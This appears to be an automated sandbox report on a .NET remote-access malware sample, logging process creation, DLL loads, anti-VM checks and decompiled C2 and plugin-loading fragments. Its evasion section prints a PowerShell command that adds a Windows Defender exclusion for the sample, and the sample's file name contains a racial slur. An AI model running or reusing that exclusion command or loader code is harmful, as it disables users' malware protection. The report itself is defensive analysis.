          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4872 --field-trial-handle=1976,i,9986206320547753570,420349288583730614,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\sucklemydicknigger.exe'Jump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

          Data Obfuscation

          barindex
          Source: Unconfirmed 610443.crdownload.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
          Source: Unconfirmed 610443.crdownload.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
          Source: chromecache_49.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
          Source: chromecache_49.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
          Source: Unconfirmed 610443.crdownload.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
          Source: Unconfirmed 610443.crdownload.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
          Source: Unconfirmed 610443.crdownload.0.dr, Messages.cs.Net Code: Memory
          Source: chromecache_49.2.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
          Source: chromecache_49.2.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
          Source: chromecache_49.2.dr, Messages.cs.Net Code: Memory
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\sucklemydicknigger.exe (copy)Jump to dropped file
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 49Jump to dropped file
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\Unconfirmed 610443.crdownloadJump to dropped file
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 49
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 49Jump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeMemory allocated: 2F60000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeMemory allocated: 1B180000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4632Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5168Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5284Thread sleep time: -8301034833169293s >= -30000sJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: sucklemydicknigger.exe, 00000008.00000002.2593068898.0000000001508000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\sucklemydicknigger.exe'
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\sucklemydicknigger.exe'Jump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\sucklemydicknigger.exe'
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\sucklemydicknigger.exe'Jump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeQueries volume information: C:\Users\user\Downloads\sucklemydicknigger.exe VolumeInformationJump to behavior
